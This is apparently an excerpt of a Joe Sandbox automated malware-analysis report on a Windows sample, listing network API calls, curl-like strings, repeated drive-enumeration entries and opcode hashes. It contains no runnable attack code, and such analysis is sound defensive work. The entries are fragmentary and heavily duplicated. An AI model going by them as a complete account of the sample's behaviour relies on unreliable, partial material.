Control-flow Graph: function entry 5376a0 (interactive graph, blocks coloured Executed / Not Executed; API block: 5376e6-5376f2 send)
                                                  APIs
                                                  • send.WS2_32(multi.c,?,?,?,N=S,00000000,?,?,005407BF), ref: 005376EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: same dump list as the first Memory Dump Source entry above
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID: LIMIT %s:%d %s reached memlimit$N=S$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                  • API String ID: 2809346765-3401056187

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: WSAIoctl, setsockopt, plus internal subroutines.
                                                  APIs
                                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0056935D
                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00569389
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Ioctlsetsockopt
                                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                  • API String ID: 1903391676-2691795271

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: recv, plus internal subroutines.
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                  • API String ID: 1507349165-640788491

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: socket, plus internal subroutines.
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                  • API String ID: 98920635-842387772

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: GetLogicalDrives, plus internal subroutines.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A:\$A:\
                                                  • API String ID: 0-1047444362

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: GetLogicalDrives, plus internal subroutines.
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: GetLogicalDrives, plus an internal subroutine.
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362

                                                  Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced). Calls named in the graph: GetLogicalDrives, plus an internal subroutine.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A:\$A:\
                                                  • API String ID: 0-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A:\$A:\
                                                  • API String ID: 0-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 0056A1C7
                                                  Strings
                                                  • getsockname() failed with errno %d: %s, xrefs: 0056A1F0
                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0056A23B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3358416759-2605427207
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202), ref: 0054D65B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID: if_nametoindex$iphlpapi.dll
                                                  • API String ID: 724789610-3097795196
                                                  APIs
                                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 005FAB9B
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 005FABE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: ioctlsocketsocket
                                                  • String ID:
                                                  • API String ID: 416004797-0
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID: FD %s:%d sclose(%d)
                                                  • API String ID: 2781271927-3116021458
                                                  APIs
                                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,005FB29E,?,00000000,?,?), ref: 005FB0B9
                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,005E3C41,00000000), ref: 005FB0C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastconnect
                                                  • String ID:
                                                  • API String ID: 374722065-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7238d20fc641030e4ab5979348f98e0050715b76480dacd5f7ba4f3a4403c520
                                                  • Instruction ID: ed24520ec43ebbbcfbe4e1f8cf6511889b5e9946600d58c04371b8cd9f8d4a85
                                                  • Opcode Fuzzy Hash: 7238d20fc641030e4ab5979348f98e0050715b76480dacd5f7ba4f3a4403c520
                                                  • Instruction Fuzzy Hash: 637127E757C12BFEA97290851B14AFB6B6EF6D3730F388036B807D6642E2D84A495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddbad581a069bf357729eff1861c3703b3a15bc008c907493359fcce909475ff
                                                  • Instruction ID: f66f8a80b08824a844a3eb17eb59004dca716fa56c2e762ba454fa6f38d9941c
                                                  • Opcode Fuzzy Hash: ddbad581a069bf357729eff1861c3703b3a15bc008c907493359fcce909475ff
                                                  • Instruction Fuzzy Hash: 747127E757C12BBEA97290855B14AFA6B6EF6D3730F388036F807D6602F2D40E495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c08179b41c1d4f94e282ed7295556ae09077b17819c99e57fd0c51d3b8962b85
                                                  • Instruction ID: cf86985f4990b206149dae35165f3a7c93636a1c0ae25b5ae910afc445c02416
                                                  • Opcode Fuzzy Hash: c08179b41c1d4f94e282ed7295556ae09077b17819c99e57fd0c51d3b8962b85
                                                  • Instruction Fuzzy Hash: 17711AE757C12BFEA97280851B14AFA6B6EF6D7730F388036F807D6642E2D44A495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6a1e7749a9b7f3d6117e018e51821821dd647fa6d6e00214c1bf3cb5d7c79db
                                                  • Instruction ID: 8f9165a9cd157a41b067ffb007bfb231ad73855a780e0f5a6b4da79eea9024e6
                                                  • Opcode Fuzzy Hash: f6a1e7749a9b7f3d6117e018e51821821dd647fa6d6e00214c1bf3cb5d7c79db
                                                  • Instruction Fuzzy Hash: 6E713BE757C12BBEA97290855B54AFA6B2EF6D7730F388036F807D6602F2D40E495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2200593cc26c9673b0aa9f7006f29b88b57e20bb9298a6a1685bccd6d1e38332
                                                  • Instruction ID: 1d36182e64d33e24f567d1173af308ecad275ad58686c6ce820a4b428f0e80f7
                                                  • Opcode Fuzzy Hash: 2200593cc26c9673b0aa9f7006f29b88b57e20bb9298a6a1685bccd6d1e38332
                                                  • Instruction Fuzzy Hash: 646105E757C12BFEA97280851B14AFA6B6EF6D3730F388036B807D6642E2D84E495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: adad9b6089f9359d2ed5531c91715fb3cc0d181e336ef7d82cc1932754b9f4b4
                                                  • Instruction ID: 83e53966dbd167efd0dabc047aeefab3bda05e72f4b47e80dc0971aa2d6f3581
                                                  • Opcode Fuzzy Hash: adad9b6089f9359d2ed5531c91715fb3cc0d181e336ef7d82cc1932754b9f4b4
                                                  • Instruction Fuzzy Hash: 2561F6E757C12BBEA97280851B14AFA6B6EF6D7730F388036B807D6642E3D44A495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90941be0adfa27c737ce5f6983b4fe7c21ede6ecb39f3b09d16b11479ab510f0
                                                  • Instruction ID: 7630633618e96268e0377e9e09a250c0557d3741ea68d9ea51ff382bd9467ec4
                                                  • Opcode Fuzzy Hash: 90941be0adfa27c737ce5f6983b4fe7c21ede6ecb39f3b09d16b11479ab510f0
                                                  • Instruction Fuzzy Hash: 186126E757C12BFEA97280851B14AFA6B6EF6D3730F388036B807D6642E2D80A495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a7325561486c4034bcf6e17853c7f04d22cf40c1637e91a4025e02e24861e4f
                                                  • Instruction ID: 2f9a5f36650e4ef0fdafbfc96be82c64fae878b9ee14be9e7283894b9ddd186a
                                                  • Opcode Fuzzy Hash: 0a7325561486c4034bcf6e17853c7f04d22cf40c1637e91a4025e02e24861e4f
                                                  • Instruction Fuzzy Hash: 3C6116E757C11BFEAA7280851B54AFA6B6EF6D3730F388036B807D6642E2D40E495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e831ad0dade308474c1f2aeb30f026b8810338f6514b0ff1e28d4956c6468a1e
                                                  • Instruction ID: eeaf4ab0421524a4fb367edb597fad45d0c90b00da1b718f2228f25fca5aa1a0
                                                  • Opcode Fuzzy Hash: e831ad0dade308474c1f2aeb30f026b8810338f6514b0ff1e28d4956c6468a1e
                                                  • Instruction Fuzzy Hash: 5D51E5E757C12BFE697280851B14AFA6A2EF6D7730F389036B807D6642E3D40F495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c36f1df73e409fbd32f0ddb96f92c029a3260d088797ac51e27b85cf41951bf
                                                  • Instruction ID: c1cdad6fffb516f44aadbb560a0de8f0c7762b2b3f63b17367fc0c203574d207
                                                  • Opcode Fuzzy Hash: 2c36f1df73e409fbd32f0ddb96f92c029a3260d088797ac51e27b85cf41951bf
                                                  • Instruction Fuzzy Hash: A751F5E757C12BFE697280851B14AFB6A2EF6D7730F388036B807DA602E3D40E495071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4eb5be588ecaec45877fbfc0080d545bc56db9feaa5f307cad162354fa93e9c
                                                  • Instruction ID: dfc561a928dc0b781c5d58d5b67960f67c5602059162ea58322b628600239217
                                                  • Opcode Fuzzy Hash: b4eb5be588ecaec45877fbfc0080d545bc56db9feaa5f307cad162354fa93e9c
                                                  • Instruction Fuzzy Hash: AB51E6E757C12BBE697280855B54AFA6B2FF6D7730F388036B807D6642E3D84B491071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3998fa6ffd6938a010d01f26ab3cd9b15a40d34d422c32ebd87caaa082f92763
                                                  • Instruction ID: 2a6aff4e6848506eb50574bb1e2e2ec0fdc6062cc4c706a30113f12bce5da84a
                                                  • Opcode Fuzzy Hash: 3998fa6ffd6938a010d01f26ab3cd9b15a40d34d422c32ebd87caaa082f92763
                                                  • Instruction Fuzzy Hash: AF5107E757C12BBEA97380851B54AFA6B2FF6D7730F388036B407DA642E3D40A491071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d918205762784144492c505877475192735167dfe60793b14b072efc59ba34d8
                                                  • Instruction ID: cdff5849c31b55e34efae5b673333b8237c38fbb2d5e44e074c4503cedb64e1e
                                                  • Opcode Fuzzy Hash: d918205762784144492c505877475192735167dfe60793b14b072efc59ba34d8
                                                  • Instruction Fuzzy Hash: 105148E757C12BBEAA7340851B64AF66B2FFAD7730F388036B407DA642E2D54A494071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48177fdec4d76ae4a0d93c384f65484d533386a8c682ef7aff370181925782cc
                                                  • Instruction ID: 8340f176659ea691518ad4cfece8e0ae1c924d0f6cf15096c23d205f0d62f8a8
                                                  • Opcode Fuzzy Hash: 48177fdec4d76ae4a0d93c384f65484d533386a8c682ef7aff370181925782cc
                                                  • Instruction Fuzzy Hash: 3C5105E757C12BBE697380855B64AFA6A2FF6D7730F388036B807DA642E3D40A491071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3f8f12e9458a5c643848c2a29e2ceacafb973604e7aa42fe532c956f362ef765
                                                  • Instruction ID: 35eb280eb802726f4df6b06ed1b74ca216753140cd123ec98847b4cf9dab65ca
                                                  • Opcode Fuzzy Hash: 3f8f12e9458a5c643848c2a29e2ceacafb973604e7aa42fe532c956f362ef765
                                                  • Instruction Fuzzy Hash: 755104E757C12BBE697350851B14AFA6A2FF6D7730F388036B807EB642E3D84A491071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b77c6d98fad30f5463fa49d1214b65396ac8def22003d68ed5046544ed1ed0e4
                                                  • Instruction ID: df434bc3406262161eb2b1120324c121a5185ae66cc0102a895a4cebf47be339
                                                  • Opcode Fuzzy Hash: b77c6d98fad30f5463fa49d1214b65396ac8def22003d68ed5046544ed1ed0e4
                                                  • Instruction Fuzzy Hash: E84127E757C12BBE697290811B14AF76A2FF6D7730F388032B807DA642E2D44E490071
                                                  Memory Dump Source
